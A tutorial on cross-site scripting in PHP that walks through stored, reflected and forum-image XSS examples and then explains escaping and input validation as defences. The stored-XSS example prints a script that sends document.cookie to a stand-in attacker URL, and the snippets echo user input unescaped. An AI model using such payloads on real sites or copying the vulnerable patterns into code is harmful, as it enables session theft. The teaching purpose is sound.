Question 1: What is Cross-Site Scripting Attack?

Question 2: What damages may be caused by Cross-Site Scripting Attack?

Question 3: How to prevent Cross-Site Scripting Attack?

1. What is Cross-Site Scripting Attack

2. Some examples of Cross-Site Scripting Attack

3. Prevention of Cross-Site Scripting Attack

Cross-Site Scripting Attack, simply written XSS, is by writing a malicious script or HTML code into the content of the web page, the malicious data will be constructed and displayed on the browser of the user's computer, thus launching an attack on the user, resulting in user data leakage.

The most typical is that attackers can use Cross-Site Scripting vulnerabilities to steal user's cookies, get the user's identity rights in the site, and thus impersonate the user to perform some operations on the site.

A Cookie is a small piece of data that the server stores on a user's computer via a browser.

Normally in PHP, we use session to determine the identity of the user.

When we visit the website for the first time, PHP will send a cookie to the browser to mark the user's identity. For different browsers, PHP will send different cookies, and when the browser visits the website, it will send the cookie back to PHP. In this way, PHP can determine which session the user corresponds to according to different cookies.

A cookie corresponds to a session in PHP. Therefore, as long as the attacker gets the cookie of the attacked user and sends it to PHP, it is equivalent to the attacker getting the session of the user, and PHP will think that the attacker is the hacked user, so that the attacker can impersonate the user's identity to visit the website, perform all kinds of illegal operations that only the user can perform.

Submit to a message board:

<form action=“save.php” method=“post”>

Username: <input type=“text” name=“username” />

Message: <textarea name=“comment”></textarea>

</form>

 

Display message board:

<?php

//get name and message from database (omitted)

//show name and message

echo “Username: ” . $username . “, message is: ” . $comment;

?>

 

If the attacker leave following messages:

 

<script>

window.location = “http://www.example.com/hack.php?cookies=" + document.cookie;

</script>

 

When the message board is displayed, this part of script is displayed directly. When the user views the message board, this script is automatically executed, so that the user's cookie is passed to the attacker website, and the attacker can use the cookie to simulate other actions of the user.

<form action=“search.php” method=“post”>

Keywords: <input type=“text” name=“keywords” />

</form>

 

Show search result:

<?php

echo “Searching keywords ” . $_GET[“keywords”] . “ found the following results:”;

//show search result, omitted

?>

 

If attackers send links to others like this:

search.php?keywords=<script>alert();</script>

 

Then when the user opens this link, it shows:

Searching keywords <script>alert();</script> found the following results:

 

This successfully inserts the attack script, and the attacker can replace the alert with other offensive scripts to achieve the purpose of the attack.

Many forums support the insertion of images when posting, for example:

 

[img]http://www.example.org/logo.gif[/img]

 

When forum posts are displayed, the [img] tag is replaced with official html code, for example, the above example is replaced with:

<img src=“http://www.example.org/logo.gif”>

 

When the attacker enters a tag like this:

[img]javascript:alert();[/img]

 

It is replaced with html code like this when displaying:

<img src=“javascript:alert();”>

 

This also successfully inserted the attack script, the attacker can replace alert with other offensive scripts to achieve the purpose of the attack.

1. For all the input data, it should be filtered to remove the special characters. For example, when saving to a database, use htmlentities to remove special html characters.

 

2. For all the output display data, also have to be filtered. Replace < with &lt;, replace > with &gt;, this does not affect the display results, but prevents the script from being executed.

 

For 2.1, using this method, the message board displayed is:

&lt;script&gt;

window.location = “http://www.example.com/hack.php?cookies=" + document.cookie;

&lt;/script&gt;

 

For 2.2, using the same method, the result is shown as follows:

Searching keywords &lt;script&gt;alert();&lt;/script&gt; found the following results:

 

In these cases, the script will not be executed, preventing attacks.

 

3. For all user input results should be carefully analyzed, combined with the actual situation to develop restrictions, while judging the user's input, must meet the actual restrictions.

 

For 2.3, only pictures can be displayed, so you should check data between [img] and [img] should be started with http://, and also replate " to &quot; to prevent the attack occupied.